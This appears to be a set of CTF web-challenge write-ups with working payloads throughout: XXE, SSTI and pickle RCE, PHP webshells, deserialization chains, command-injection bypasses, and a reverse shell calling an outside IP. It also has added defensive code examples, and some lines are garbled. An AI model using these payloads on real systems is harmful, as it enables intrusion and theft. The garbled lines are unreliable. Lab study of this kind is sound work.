PolarCTF WEB Write-ups
I forgot to take notes for the WEB challenges on the first page (the scattered ones are not yet organized; notes start from the second page, beginning with the xxe challenge).
swp
100 points, 1 Polar coin
….
…..
echo '{"username":"admin"}'|base64
eyJ1c2VybmFtZSI6ImFkbWluIn0K
https://github.com/brendan-rius/c-jwt-cracker
https://www.json.cn/jwt
git config --global --unset https.https://github.com.proxy
git config --global --unset http.https://github.com.proxy
git config --global http.https://github.com.proxy http://192.168.1.77:7890
git config --global https.https://github.com.proxy https://192.168.1.77:7890
git config --global http.proxy 'socks5://192.168.1.77:7890'
git config --global https.proxy 'socks5://192.168.1.77:7890'
apt-get --reinstall install ca-certificates
update-ca-certificates --fresh
proxychains git clone https://github.com/brendan-rius/c-jwt-cracker.git
git config --global http.sslVersion tlsv1.2
wget https://github.com/brendan-rius/c-jwt-cracker/archive/refs/heads/master.zip
unzip master.zip
cd c-jw*
make
┌──(root㉿kali)-[/opt/jwt-craker/c-jwt-cracker-master]
└─# ./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIxIn0.CmpFDAAgLHHSvvnyYLsumJy_Hu8dW7iRwnMTKTekOPI
Secret is "SYSA"
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
https://github.com/PwnFunction/CVE-2021-4034
flag{caf647de0b12baea8774fefc93006fec}
X-Forwarded-For:127.0.0.1
X-Forwarded:127.0.0.1
Forwarded-For:127.0.0.1
Forwarded:127.0.0.1
X-Forwarded-Host:127.0.0.1
X-remote-IP:127.0.0.1
X-remote-addr:127.0.0.1
True-Client-IP:127.0.0.1
X-Client-IP:127.0.0.1
Client-IP:127.0.0.1
X-Real-IP:127.0.0.1
Ali-CDN-Real-IP:127.0.0.1
Cdn-Src-Ip:127.0.0.1
Cdn-Real-Ip:127.0.0.1
CF-Connecting-IP:127.0.0.1
X-Cluster-Client-IP:127.0.0.1
WL-Proxy-Client-IP:127.0.0.1
Proxy-Client-IP:127.0.0.1
Fastly-Client-Ip:127.0.0.1
True-Client-Ip:127.0.0.1
Host: 127.0.0.1
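The header list above works against code that reads the first client-address header it finds. The Python below is an added example (not from this write-up) contrasting that naive pattern with the check a backend should make: the peer address is the only fact the server knows, and X-Forwarded-For is believed only when the peer is a configured proxy, and then only the element that proxy itself appended. Header names, the `trusted_proxies` parameter and the sample addresses are this example's own.

```python
import ipaddress

# The spoofable client-address headers listed above, lower-cased.  Constructed
# for this example; any backend that believes one of them on a direct
# connection can be made to see "127.0.0.1".
CLIENT_IP_HEADERS = (
    "x-forwarded-for", "x-real-ip", "x-client-ip", "client-ip", "true-client-ip",
    "cf-connecting-ip", "x-originating-ip", "x-remote-addr",
)


def naive_client_ip(remote_addr: str, headers: dict) -> str:
    """The pattern the header list above defeats: trust the first IP header seen."""
    for name in CLIENT_IP_HEADERS:
        if name in headers:
            return headers[name].split(",")[0].strip()
    return remote_addr


def client_ip(remote_addr: str, headers: dict, trusted_proxies=()) -> str:
    """Return the address to treat as the client's.

    `remote_addr` is the TCP peer and `headers` maps lower-cased header names to
    values.  X-Forwarded-For is honoured only when the peer is one of the
    configured proxies, and then only its last element (the hop that proxy
    itself appended) is believed; everything earlier is client-supplied.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer not in {ipaddress.ip_address(p) for p in trusted_proxies}:
        return str(peer)
    hops = [h.strip() for h in headers.get("x-forwarded-for", "").split(",") if h.strip()]
    if not hops:
        return str(peer)
    try:
        return str(ipaddress.ip_address(hops[-1]))
    except ValueError:
        return str(peer)  # malformed value: fall back to the peer, never to the header


def is_local_request(remote_addr: str, headers: dict, trusted_proxies=()) -> bool:
    """An 'only from localhost' check that cannot be satisfied by adding headers."""
    return ipaddress.ip_address(client_ip(remote_addr, headers, trusted_proxies)).is_loopback
```

With no trusted proxy configured the headers are ignored entirely, which is the right default for an application that is reached directly.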
create_function
create_function('', $root)
system(%22s\ort%20/flag%22);
function anonymous() {
}system("s\ort /flag");
θվ±»º؍
500 points, 5 Polar coins
echo F5XDAXZQNZSV6ZRRNZSF63JTF4 |base32 -d
/n0_0ne_f1nd_m3/
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the 504sys")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag|data|base|write|input/i",$file)){
echo "I am sorry but no way!";
exit();
}else{
include($file); //imposible.php
}
}
php://filter/resource=http://www.example.com
php://filter/read=string.toupper/resource=xxx.php
php://filter/convert.base64-encode/resource=xxx.php
php://filter/read=string.toupper|string.rot13/resource=xxx.php
file_put_contents("php://filter/write=string.rot13/resource=example.txt","Hello World");
php://filter/read=string.rot13/resource=hello.php
php://filter/string.rot13/resource=imposible.php
?text=php://input&file=php://filter/read=string.rot13/resource=imposible.php
POST:welcome to the 504sys
?text=data://text/plain,welcome to the 504sys&file=php://filter/read=string.rot13/resource=imposible.php
http://www.hiencode.com/rot13.html
?file=php://filter/convert.base64-encode/resource=..././..././..././..././flag
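The payloads above work because `include($file)` is handed a stream wrapper (`php://filter`, `php://input`, `data://`) or a traversal string that survives a one-pass `../` removal. The Python below is an added example (not from this write-up) of the resolution step a file-include feature should perform instead: refuse any wrapper scheme, normalise the path, and require the result to stay under the include directory. The function names and the sample directory are this example's own.

```python
import os
import re

_SCHEME = re.compile(r"^[a-z][a-z0-9+.-]*:", re.IGNORECASE)


class RejectedPath(ValueError):
    pass


def strip_dotdot_once(requested: str) -> str:
    """The filter the '..././' payloads are written for: removing '../' in a
    single pass turns '..././' into '../', so it is no protection at all."""
    return requested.replace("../", "")


def resolve_include(base_dir: str, requested: str) -> str:
    """Map a user-supplied include name onto a file under base_dir, or raise.

    Stream wrappers are refused up front (php://filter, php://input, data://
    and file:// would otherwise be handed to include()), and the final,
    normalised path must still lie inside base_dir.
    """
    if _SCHEME.match(requested):
        raise RejectedPath("stream wrappers are not allowed")
    if "\x00" in requested:
        raise RejectedPath("NUL byte in path")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        raise RejectedPath("path escapes the include directory")
    return target


def include_allowed(base_dir: str, requested: str) -> bool:
    try:
        resolve_include(base_dir, requested)
        return True
    except RejectedPath:
        return False
```

Stronger still is an allow-list mapping page names to files, which takes the path out of the user's hands altogether; the check above is the minimum for code that must accept a path.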
…..
xxe
300 points, 3 Polar coins
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "file:///var/www/html/flagggg.php">
]>
<root>
<name>&xxe;</name>
</root>
file:///path/to/file.ext
http://url/file.ext
php://filter/read=convert.base64-encode/resource=conf.php
<!DOCTYPE root [<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/flagggg.php">]>
<root>&file;</root>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>
SSTI
300 points, 3 Polar coins
?name={%for(x)in().__class__.__base__.__subclasses__()%}{%if'war'in(x).__name__ %}{{x()._module.__builtins__['__import__']('os').popen('cat /flag').read()}}{%endif%}{%endfor%}
flask_pin
500 points, 5 Polar coins
/sys/class/net/eth0/address
/etc/machine-id
/proc/sys/kernel/random/boot_id
The machine-id approach doesn't seem to work; parked for now, to be updated.
unpickle
300 points, 3 Polar coins
Cookie: user
Generate the value:
import pickle
import base64
import requests

class RCE:
    def __reduce__(self):
        return eval, ("open('/flag','r').read()",)
        # return eval, (f"__import__('pickle').loads({f})",)

a = RCE()
payload = base64.b64encode(pickle.dumps(a))
print(base64.b64decode(payload))
# mirrors the server's string-replacement denylist before loads
pickle.loads(base64.b64decode(payload).replace(b'os', b'').replace(b'reduce', b'').replace(b'system', b'').replace(b'env', b'').replace(b'flag', b''))
print(payload)
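The server in this challenge defends `pickle.loads` by deleting substrings such as `os` and `system` from the bytes, which is why a `__reduce__` that calls `eval` gets through. The Python below is an added example (not from this write-up) of the control that actually works: a restricted unpickler whose `find_class` only resolves an explicit allow-list, so every callable a pickle asks for is refused before it can run. `CallsLen` is a harmless stand-in constructed for the demonstration; the allow-list contents are this example's own choice.

```python
import builtins
import io
import pickle

# Globals an unpickler may resolve.  Deliberately tiny; widen per application,
# never with a denylist of names.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"), ("builtins", "range")}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Every callable a pickle wants to invoke (eval, os.system, subprocess.Popen, ...)
        # arrives here first, so this is the one place to enforce an allow-list.
        if (module, name) in SAFE_GLOBALS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global %s.%s is forbidden" % (module, name))


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


class CallsLen:
    """Harmless stand-in for the challenge's RCE class: __reduce__ asks the
    unpickler to call builtins.len("abc") at load time.  A real payload
    substitutes eval or os.system; the mechanism is identical."""
    def __reduce__(self):
        return len, ("abc",)


def plain_loads_result(data: bytes):
    """What the unrestricted pickle.loads does with the same bytes."""
    return pickle.loads(data)


def is_refused(data: bytes) -> bool:
    try:
        restricted_loads(data)
        return False
    except pickle.UnpicklingError:
        return True


def demo_pickles():
    """Constructed inputs: a benign list and the reduce-based payload."""
    return pickle.dumps([1, 2, 3]), pickle.dumps(CallsLen())
```

Plain `pickle.loads` executes the reduce call and returns 3; the restricted loader raises on `builtins.len` because it is not on the list, while the plain list still loads. Bytes-level substring filtering never sees the call at all, which is why it can be routed around.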
签到 (Sign-in)
100 points, 1 Polar coin
Remove the disabled attribute from the submit button.
session文件包含 (Session file inclusion)
100 points, 1 Polar coin
Read the code and find the vulnerability.
?file=php://filter/convert.base64-encode/resource=action.php
POST: name=<?php @eval($_POST['cmd']);?>
?file=/tmp/sess_tue09ggom8bkshcqrjrb0lm3t6
POST: name=<?php @eval($_POST['cmd']);?>
POST: name=<?php system('ls /');?>
POST: name=<?php system('cat /flaggggg ');?>
cmd=system("cat /flaggggg |base64");
Because the output contains only a carriage return and no line feed, it does not show up in the normal rendering: the carriage return moves the cursor back to the start of the line.
POST: name=<?php echo 'aa';@eval($_POST['cmd']);?>
Don't touch me
100 points, 1 Polar coin
A directory scan finds 2.php and 3.php.
The button in 2.php can be changed to enabled.
A comment in 3.php reveals fla.php.
veryphp
500 points, 5 Polar coins
-a9<b>>{4}DDabcphp@Rs
shaw[root=-a?<b>rrrrr>>>>>RabcRphphp@Rr
-a?<b>rrrrr>>>>>RabcRphphp@Rr
shaw root=-a?<b>rrrrr>>>>RabcRphphp@Rrr&ans=21475&my[ans=qwq::oao
shaw[root=-a?rrrrr>>>>RabcRphphp@Rrr
if(preg_match('/^\-[a-e][^a-zA-Z0-8]<b>(.*)>{4}\D*?(abc.*?)p(hp)*\@R(s|r)./',$shaw_root)&& strlen($shaw_root)===29){
-a9<b>rrrrr>>>>RabcRphphp@Rrr
Even the strings constructed from online write-ups that supposedly pass don't get through!!!
BlackMagic
300 points, 3 Polar coins
strTmp= xxxxx…xxxxx
反序列化 (Deserialization)
300 points, 3 Polar coins
https://www.bejson.com/runcode/php/
unserialize
<?php
class example{
    public $handle;
    function __construct(){
        $this->handle = new process();
    }
}
class process{
    public $pid;
    function __construct(){
        $this->pid = "phpinfo();";
    }
}
$test = new example();
echo serialize($test); // print the payload
?>
O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:10:"phpinfo();";}}
O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:15:"system('ls /');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:15:"system('ls /');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:14:"system('env');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:17:"system('whoami');";}}
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:21:"system('echo $FLAG');";}}
# The one below was taken from the environment variables; submitting it was rejected
flag{4388f834-8723-4bca-b8c1-6fd53cd47b55}
flag错误,请检查仔细后提交。
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:27:"system('ls /var/www/html');";}}
flag.php index.php
?data=O:7:"example":1:{s:6:"handle";O:7:"process":1:{s:3:"pid";s:37:"system('cat /var/www/html/flag.php');";}}
The flag is in a comment in the output.
毒鸡汤 (Poisonous chicken soup)
500 points, 5 Polar coins
Directory scan
robots.txt -> hint.txt
www.zip
?readfile=/flag
upload tutu
500 points, 5 Polar coins
In short, it needs two images with the same MD5 value.
Find a tool: fastcoll can generate two files with the same MD5.
http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
Take an image; I simply renamed the one-line webshell I had tested earlier to test.jpg. The tool then generates two images with the same MD5; upload them to the two upload slots to get the flag.
fastcoll_v1.0.0.5.exe -p D:\download\aaaa\gsl.png -o D:\download\aaaa\md1.png D:\download\aaaa\md2.png
Unserialize_Escape
500 points, 5 Polar coins
";i:1;s:6:"123456";}
That is 20 characters, so we only need to put 20 x's in front, which become 20 yy's. That achieves the overflow.
xxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}
<?php
function filter($string){
    return preg_replace('/x/', 'yy', $string);
}
$username = 'xxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}';
$password = "aaaaa";
$user = array($username, $password);
$r = filter(serialize($user));
echo $r;
echo "\n";
echo unserialize($r);
echo "\n";
echo unserialize($r)[1];
?>
a:2:{i:0;s:40:"yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";i:1;s:6:"123456";}";i:1;s:5:"aaaaa";}
Array
123456
robots
100 points, 1 Polar coin
/robots.txt
找找shell (Find the shell)
300 points, 3 Polar coins
shell.php
┌──(root㉿kali)-[~]
└─# echo PD9waHAgQGV2YWwoJF9QT1NUWyd1c2FtJ10pOyA/Pg|base64 -d
usam=system("ls /");
usam=system("env");
WD=/var/www/html FLAG=flag{3f2664f6-b375-4671-b9b4-0fa5b8026d01}
Submission rejected
zheshiflag.php
usam=system("cat zheshiflag.php");
flag{2591c98b70119fe624898b1e424b5e91} This one works.
自由的文件上传系统 (Free file upload system)
500 points, 5 Polar coins
? -> !
A webshell containing a question mark cannot be used.
/sectet_include.php?file=upload/5744893807
pass=system("ls /");
pass=system("cat /f1ag_1s_h3R3_And_You_W1LL_n3v3R_F1nd");
再来ping一波啊 (Ping it again)
300 points, 3 Polar coins
?ip=127.0.0.1;echo$IFS$9$PATH
cat index.php
echo$IFS$9Y2F0IGluZGV4LnBocA$IFS$9|base64$IFS$9-d|sh
┌──(root㉿kali)-[~]
└─# echo Y2F0IGluZGV4LnBocA|base64 -d
cat index.php
wu
300 points, 3 Polar coins
a=$_=[].[];$__='';$_=$_[''];$_=++$_;$_=++$_;$_=++$_;$_=++$_;$__.=$_;$_=++$_;$_=++$_;$__=$_.$__;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$_=++$_;$__.=$_;${'_'.$__}[$_](${'_'.$__}[$__]);$_="";
$_[+""]='';$_="_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");${'_'.$_}['_'](${'_'.$_}['__']);$_="";
$_++; //$_=1
$__=("#" ^ "|"); // _
$__.=("." ^ "~"); // _P  ("." concatenates strings)
$__.=("/" ^ "`"); // _PO
$__.=("|" ^ "/"); // _POS
$__.=("{" ^ "/"); // _POST
${$__}[!$_](${$__}[$_]);
//$_POST[0]($_POST[1]);
$_++;$__=("#" ^ "|");$__.=("." ^ "~");$__.=("/" ^ "`");$__.=("|" ^ "/");$__.=("{" ^ "/");${$__}[!$_](${$__}[$_]);
0=assert&1=phpinfo();
0=eval&1=phpinfo();
Still doesn't work.
php very nice
100 points, 1 Polar coin
https://www.bejson.com/runcode/php/#google_vignette
<?php
class example{
    public $sys = "phpinfo();";
    function __destruct(){
        eval($this->sys);
    }
}
$test = new example();
echo serialize($test); // print the payload
?>
O:7:"example":1:{s:3:"sys";s:10:"phpinfo();";}phpinfo()
O:7:"example":1:{s:3:"sys";s:13:"system('ls');";}
?a=O:7:"example":1:{s:3:"sys";s:23:"system('cat flag.php');";}
ezupload
100 points, 1 Polar coin
mm.gif -> mm.php
<?php eval($_POST["pass"]);?>
pass=system("cat ../flag.php");
ezjava
500 points, 5 Polar coins
[2023 Autumn Individual Challenge] The flag is in /app/flag.txt
/SPEL/vul?ex=S
?ex=T(java.lang.Runtime).getRuntime().exec("bash -c {echo,xxxxxxxxxxx}|{base64,-d}|{bash,-i}")
ls
bHMK
?ex=T(java.lang.Runtime).getRuntime().exec("bash -c {echo,bHMK}|{base64,-d}|{bash,-i}")
┌──(root㉿kali)-[~]
└─# echo YmFzaCAtaSa+JiAvZGV2L3RjcC8zOS4xMdcuMTEzLjI1MC85MDAyIDA+JiE=|base64 -d
bash -i&dev/tcp/39.113.250/9002 0>&!
?ex=T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSa+JiAvZGV2L3RjcC8zOS4xMdcuMTEzLjI1MC85MDAyIDA+JiE=
}|{base64,-d}|{bash,-i}")
?ex=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","cat /app/flag*"}).start().getInputStream(),"gbk”)).readLine()
?ex=new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","cat /app/flag*"}).start().getInputStream(),"gbk")).readLine()
HTTP Status 400 – Bad Request
代码审计1 (Code audit 1)
300 points, 3 Polar coins
?sys=system&xsx="ls"
?sys=SplFileObject&xsx=php://filter/convert.base64-encode/resource=flag.php
cookie欺骗 (Cookie spoofing)
100 points, 1 Polar coin
Change the cookie to user=admin.
upload
100 points, 1 Polar coin
Upload a webshell; get past the rename filter by doubling the extension: mm.phphpp
干正则 (Beat the regex)
100 points, 1 Polar coin
?id=a[]%3Dwww.polarctf.com%26a[]%3Dwww.polarctf.com%26a[]%3Dwww.baidu.com&cmd=;ls
?id=a[]%3Dwww.polarctf.com%26a[]%3Dwww.polarctf.com%26a[]%3Dwww.baidu.com&cmd=;ls;cat fla*|base64;
苦海 (Sea of bitterness)
500 points, 5 Polar coins
unserialize()
│
└─▶ User::__wakeup()
│
└─▶ User::printName()
│
└─▶ access name (a Surrender object)
│
└─▶ Surrender::__toString()
│
└─▶ access file['filename']->content (triggers __get)
│
└─▶ FileRobot::__get()
│
└─▶ call path() (triggers __invoke)
│
└─▶ FileRobot::__invoke()
│
└─▶ FileRobot::Get_file('flag.php')
```php
<?php
class User {
    public $name;
    public $flag;
}
class Surrender {
    private $phone = 110;
    public $promise;
    public $file; // the key property, added dynamically
}
class FileRobot {
    public $filename;
    public $path;
}
// build the chain
$fileRobot = new FileRobot();
$fileRobot->filename = '../flag.php'; // target file (one directory up)
$fileRobot->path = $fileRobot; // points at itself to trigger __invoke
$surrender = new Surrender();
$surrender->file = ['filename' => $fileRobot]; // triggers FileRobot::__get
$user = new User();
$user->name = $surrender; // triggers Surrender::__toString
// generate the serialized payload
$payload = serialize($user);
// URL-encode and print the payload
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
// raw payload (contains non-printable characters; take care when copying)
echo "原始Payload:\n";
echo $payload;
?>
```
URL编码后的Payload:
O%3A4%3A%22User%22%3A2%3A%7Bs%3A4%3A%22name%22%3BO%3A9%3A%22Surrender%22%3A3%3A%7Bs%3A16%3A%22%00Surrender%00phone%22%3Bi%3A110%3Bs%3A7%3A%22promise%22%3BN%3Bs%3A4%3A%22file%22%3Ba%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A9%3A%22FileRobot%22%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A11%3A%22..%2Fflag.php%22%3Bs%3A4%3A%22path%22%3Br%3A6%3B%7D%7D%7Ds%3A4%3A%22flag%22%3BN%3B%7D
原始Payload:
O:4:"User":2:{s:4:"name";O:9:"Surrender":3:{s:16:"Surrenderphone";i:110;s:7:"promise";N;s:4:"file";a:1:{s:8:"filename";O:9:"FileRobot":2:{s:8:"filename";s:11:"../flag.php";s:4:"path";r:6;}}}s:4:"flag";N;}
你想逃也逃不掉 (You can't escape)
500 points, 5 Polar coins
a:3:{s:8:"username";s:10:"aaaaaaaaaaphtmlphtmlphtmlphtml";s:6:"passwd";s:12:"bbbbbbbbbbbb";s:4:"sign";s:6:"123456";}
a:3:{s:8:"username";s:55:"aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4";s:6:"passwd";s:58:"bbbbbbbbbbbbphtmlphtmlphtmlphtmlphtmlphtmlphp4php4php4php4";s:4:"sign";s:6:"123456";}
a:3:{s:8:"username";s:55:"aaaaaaaaaa";s:6:"passwd";s:58:"bbbbbbbbbbbbp";s:4:"sign";s:6:"123456";}
$user['username'] = 'aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4';
$user['passwd'] = 'bbbbbbbbbbbbbbbbbbbbbbbb":bbbbbp";s:6:"passwd";s:5:"123456";4:"sign";s:6:"ytyyds";}cccccc';
$user['sign'] = '123456';
a:3:{s:8:"username";s:55:"aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4";s:6:"passwd";s:89:"bbbbbbbbbbbbbbbbbbbbbbbb":bbbbbp";s:6:"passwd";s:5:"123456";4:"sign";s:6:"ytyyds";}cccccc";s:4:"sign";s:6:"123456";}
$user['username'] = 'aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4';
$user['passwd'] = 'bbbbbbbbbbbbbbbbbbbbbbbb";s:6:"passwd";s:6:"123456";4:"sign";s:6:"ytyyds";}cccccc';
$user['sign'] = '123456';
name=aaaaaaaaaaphtmlphtmlphtmlphtmlphtmlphp4php4php4php4php4
?passwd=bbbbbbbbbbbbbbbbbbbbbbbb";s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}
$user->username='phtmlphtmlphtmlphtml';
$user->passwd=';s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}';
原始Payload:
a:3:{s:8:"username";s:20:"phtmlphtmlphtmlphtml";s:6:"passwd";s:46:";s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}";s:4:"sign";s:6:"123456";}
a:3:{s:8:"username";s:20:"";s:6:"passwd";s:46:";s:6:"passwd";s:0:"";s:4:"sign";s:6:"ytyyds";}";s:4:"sign";s:6:"123456";}
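Both Unserialize_Escape and 你想逃也逃不掉 rely on the same property of PHP's format: a string's declared byte length, not its content, decides where it ends, so a filter that changes lengths after `serialize()` lets attacker text become structure. The deserialization challenges on this page (反序列化, 苦海, and the others) add a second point: `unserialize()` instantiates whatever class the payload names unless `allowed_classes` restricts it. The Python below is an added example (not from this write-up) with a small parser for the `N/b/i/s/a/O` subset of PHP's format that shows both: how filtering after serialization moves the array boundary, how filtering before it does not, and how an allow-list refuses unexpected class names. `php_serialize`, `php_unserialize`, `filter_x`, `unsafe_store` and `safe_store` are this example's names.

```python
class PhpSerializeError(ValueError):
    pass


def php_serialize(value) -> str:
    """serialize() for the scalar/array subset used by these challenges."""
    if isinstance(value, bool):
        return "b:%d;" % value
    if value is None:
        return "N;"
    if isinstance(value, int):
        return "i:%d;" % value
    if isinstance(value, str):
        return 's:%d:"%s";' % (len(value.encode("utf-8")), value)  # length is in bytes
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return "a:%d:{%s}" % (len(value), body)
    raise TypeError("unsupported type %s" % type(value).__name__)


def php_unserialize(data: bytes, allowed_classes=()):
    """unserialize() for N/b/i/s/a/O.  Like PHP, it stops after the first complete
    value and ignores trailing bytes.  Objects come back as (classname, props) and
    only when classname is in allowed_classes, mirroring the allowed_classes option."""
    pos = 0

    def expect(tok: bytes):
        nonlocal pos
        if data[pos:pos + len(tok)] != tok:
            raise PhpSerializeError("expected %r at offset %d" % (tok, pos))
        pos += len(tok)

    def read_until(ch: bytes) -> bytes:
        nonlocal pos
        end = data.index(ch, pos)
        token, pos = data[pos:end], end + 1
        return token

    def read_members(count: int) -> dict:
        expect(b"{")
        out = {}
        for _ in range(count):
            key = parse()
            out[key] = parse()
        expect(b"}")
        return out

    def parse():
        nonlocal pos
        tag = data[pos:pos + 1]
        if tag == b"N":
            expect(b"N;")
            return None
        if tag in (b"i", b"b"):
            pos += 2
            num = int(read_until(b";"))
            return bool(num) if tag == b"b" else num
        if tag == b"s":
            pos += 2
            length = int(read_until(b":"))
            expect(b'"')
            raw, pos = data[pos:pos + length], pos + length  # declared length wins over content
            expect(b'";')
            return raw.decode("utf-8", "replace")
        if tag == b"a":
            pos += 2
            return read_members(int(read_until(b":")))
        if tag == b"O":
            pos += 2
            name_len = int(read_until(b":"))
            expect(b'"')
            name, pos = data[pos:pos + name_len].decode("ascii"), pos + name_len
            expect(b'":')
            if name not in allowed_classes:
                raise PhpSerializeError("class %s is not in the allow-list" % name)
            return name, read_members(int(read_until(b":")))
        raise PhpSerializeError("unknown tag %r at offset %d" % (tag, pos))

    return parse()


def filter_x(text: str) -> str:
    """The challenge's filter: one character in, two characters out."""
    return text.replace("x", "yy")


def unsafe_store(username: str, password: str) -> str:
    """Filtering AFTER serialize(): declared string lengths no longer match."""
    return filter_x(php_serialize([username, password]))


def safe_store(username: str, password: str) -> str:
    """Filtering BEFORE serialize(): lengths are computed on the final bytes."""
    return php_serialize([filter_x(username), filter_x(password)])
```

With the page's username, `unsafe_store` yields an array whose second element is the injected `123456`, while `safe_store` keeps `aaaaa`. The parser works on bytes, so the `\0Class\0prop` names of private properties (the NUL bytes that the raw payloads printed on this page lost, hence `Surrenderphone`) pass through untouched.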
你的马呢? (Where's your webshell?)
300 points, 3 Polar coins
base64 -> PD9waHAgZXZhbCgkX1BPU1RbInBhc3MiXSk7Pz4
uploads/bas64.jpg
/index.php?file=uploads/bas64.jpg
/index.php?file=php://filter/convert.base64-decode/resource=uploads/bas64.jpg
pass=system("cat /flag.txt");
ezphp
300 points, 3 Polar coins
/robots.txt
/uploads/upload.php
Upload a PNG webshell
/file/file.php?filename=../uploads/images/mm.png
/home/webuser >ls -ltr
total 4
-rw-r--r-- 1 root root 438 Nov 23 2023 flag
/home/webuser >cat flag
随机值 (Random value)
300 points, 3 Polar coins
<?php
class Index{
    private $Polar1 = 1;
    private $Polar2 = 1;
    protected $Night = 1;
    protected $Light = 1;
    function getflag($flag)
    {
        $this->Polar2 = rand(0, 100);
        if ($this->Polar1 === $this->Polar2) {
            $this->Light = rand(0, 100);
            if ($this->Night === $this->Light) {
                echo $flag;
            }
        } else {
            echo "Your wrong!!!";
        }
    }
}
$a = new Index();
echo urlencode(serialize($a));
echo "\n";
echo serialize($a);
?>
O%3A5%3A%22Index%22%3A4%3A%7Bs%3A13%3A%22%00Index%00Polar1%22%3Bi%3A1%3Bs%3A13%3A%22%00Index%00Polar2%22%3Bi%3A1%3Bs%3A8%3A%22%00%2A%00Night%22%3Bi%3A1%3Bs%3A8%3A%22%00%2A%00Light%22%3Bi%3A1%3B%7D
O:5:"Index":4:{s:13:"IndexPolar1";i:1;s:13:"IndexPolar2";i:1;s:8:"Night";i:1;s:8:"Light";i:1;}
safe_include
500 points, 5 Polar coins
?xxs=
Find the session id
?xxs=/tmp/sess_37iqjv73dcegi3odqe3bqrmi46
pass=system("ls");
phpurl
300 points, 3 Polar coins
URL-encode twice: xxs
/index.php?sys=%25%37%38%25%37%38%25%37%33
cool
100 points, 1 Polar coin
?a=passthru("cat fla*");
CB链 (CB chain)
500 points, 5 Polar coins
Complex; build the payload.
phar
500 points, 5 Polar coins
?file=php://filter/convert.base64-encode/resource=funs.php
Be careful to copy the result completely; take it from the full output.
cat 1.txt|base64 -d > 2.txt
Found a deserialization vulnerability: build a POP chain
A::__destruct -> B::__toString -> __get
https://www.bejson.com/runcode/php/
<?php
class A
{
    public $a;
    public function __construct()
    {
        $this->a = new B(); // triggers __toString
    }
}
class B
{
    public $b = array();
    public function __construct()
    {
        $this->b = array("kfc" => new C()); // triggers __get
    }
}
class C{
    public $c = array();
    public function __construct()
    {
        $this->c = array("vm50" => "flag"); // variable override: flag
    }
}
$A = new A();
echo urlencode(serialize($A));
?>
O%3A1%3A%22A.....
?file=f1@g&data=O%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A1%3A%22b%22%3Ba%3A1%3A%7Bs%3A3%3A%22kfc%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A1%3A%22c%22%3Ba%3A1%3A%7Bs%3A4%3A%22vm50%22%3Bs%3A4%3A%22flag%22%3B%7D%7D%7D%7D%7D
PHP_Deserialization
500 points, 5 Polar coins
Found a deserialization vulnerability: build a POP chain
Building the chain:
Deserialization: submitting the payload triggers Polar::__wakeup.
Deserialization trigger: Polar::__wakeup calls $night->hacker($night_arg).
Magic method call: Night::__call handles the non-existent method hacker; the $night_arg parameter is a Day object.
String conversion: converting the Day object to a string triggers Day::__toString.
File-read bypass: filename is set to /flflagag; after the replacement it becomes /flag, and the target file is read.
https://www.bejson.com/runcode/php/
<?php
class Polar {
    public $night;
    public $night_arg;
}
class Night {}
class Day {
    public $filename = "/flflagag"; // the key part
}
$day = new Day();
$night = new Night();
$polar = new Polar();
$polar->night = $night;
$polar->night_arg = $day;
$serialized = serialize($polar);
